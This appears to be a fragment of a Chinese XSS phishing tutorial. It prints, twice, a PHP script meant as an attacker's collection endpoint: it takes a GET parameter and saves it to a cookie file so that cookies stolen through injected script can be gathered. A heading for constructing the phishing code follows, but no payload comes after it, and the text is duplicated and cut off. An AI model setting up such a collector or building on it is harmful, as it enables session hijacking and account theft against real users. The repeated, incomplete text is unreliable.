xss钓鱼篇
网站接受代码
<?php
$content = $_GET['a'];
if(isset($content))
{
file_put_contents('tmp/cookie.txt',$content);
}else{
echo 'no date input';
}
?>
构造钓鱼代码
网站接受代码
<?php
$content = $_GET['a'];
if(isset($content))
{
file_put_contents('tmp/cookie.txt',$content);
}else{
echo 'no date input';
}
?>
构造钓鱼代码